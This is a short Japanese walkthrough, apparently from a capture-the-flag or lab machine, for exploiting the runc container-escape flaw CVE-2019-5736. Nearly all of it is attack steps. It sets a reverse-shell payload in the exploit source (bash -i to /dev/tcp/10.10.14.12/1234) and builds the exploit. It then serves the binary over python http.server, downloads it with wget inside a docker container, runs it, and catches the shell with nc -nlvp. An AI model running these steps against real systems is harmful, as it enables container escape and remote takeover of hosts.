🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
このマシンは CVE-2019-5736 に対して脆弱です。Runc exploit (CVE-2019-5736) の手順に従ってください。 main.go ファイルをダウンロードし、ファイル内のペイロードを次のように変更します:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
その後、以下を実行します:
go build main.go
HTTP サーバーを起動します :
python3 -m http.server

次に、以下のように 3 つのターミナルを開きます :

ターミナル 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
ターミナル 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
ターミナル 3
nc -nlvp 1234
最初の SSH ターミナルで ./main を実行したら、すぐに 2 番目の SSH ターミナルで 2 つ目のコマンドを実行してください。すると、3 番目のターミナルで netcat のリバースシェルを取得できます。

